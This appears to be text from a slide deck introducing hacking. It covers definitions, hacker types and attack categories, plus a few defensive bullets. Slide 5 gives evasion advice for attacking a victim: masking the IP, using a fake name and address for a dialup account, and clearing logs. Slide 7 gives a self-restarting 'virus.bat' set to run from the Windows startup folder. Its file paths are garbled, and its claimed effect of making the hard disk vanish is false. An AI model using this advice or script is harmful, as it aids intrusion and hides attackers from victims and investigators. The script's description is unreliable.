2. DEFINITION
Hacking refers to an array of activities
which are done to intrude some one else’s
personal information space so as to use it
for malicious, unwanted purposes.
Hacking is a term used to refer to
activities aimed at exploiting security
flaws to obtain critical information for
gaining access to secured networks.
3. HACKER : Individual who uses computers to gain unauthorized access to data.
CRACKER : Individual who uses capabilities for harmful purposes against computer systems.
ETHICAL HACKER : Individual who uses capabilities for defensive purposes.
PHREAKER : Individual who focuses on communication systems to steal calling card numbers , make free
calls , acquire access to communication systems illegally.
WHACKER: Novice hacker who attacks WAN and Wireless Network.
SCRIPT/KIDDIE : Individual without Programming skills, uses Software available on Internet.
CYBER-TERRORIST: Individual who works for government/terrorist engaged in sabotage, financial theft, and
attack on Nation’s Critical Infrastructure.
4. Eavesdropping
Identity Spoofing
Snooping Attacks
Interception
Data Modifications Attacks
Repudiation Attacks
DoS Attacks
DDoS Attacks
Password Guessing Attacks
Man-in-the-Middle Attacks
Back Door Attacks
Spoofing Attacks
Compromised Key Attacks
Application Layer Attacks
5. STEPS BEFORE HACKING
When you start hacking the first thing you need to do is: to make sure the victim will
not find out your real identity.
So hide your IP by masking it or using a anonymous proxy server. This is only
effective when the victim has no knowledge about computers and internet.
Organizations like the F.B.I, C.I.A and such will find you in no time, so beware !
The best thing to do is using a dialup connection that has a variable IP address. Be
smart, when you signup for a internet dialup connection use a fake name and
address.
When hacking never leave traces of your hacking attempts, clear log files and make
sure you are not monitored. So use a good firewall that keeps out retaliation hacking
attempts of your victim.
6. Safeguard data
Monitor control on key systems
and check inadequate logging
Protect access control
Privacy awareness training
Clear the Cookies!
7. 1) Type the following and place it in c:Programsvirus.bat.
@echo off
Copy c:Programsvirus.bat c:Programs
Start c:Programsvirus.bat
2) After that make a shortcut of virus.bat and place it in
windows startup folder.
3) Restart the machine.
4) Oops!!! There is no hard disk available in C: drive.
THANK YOU…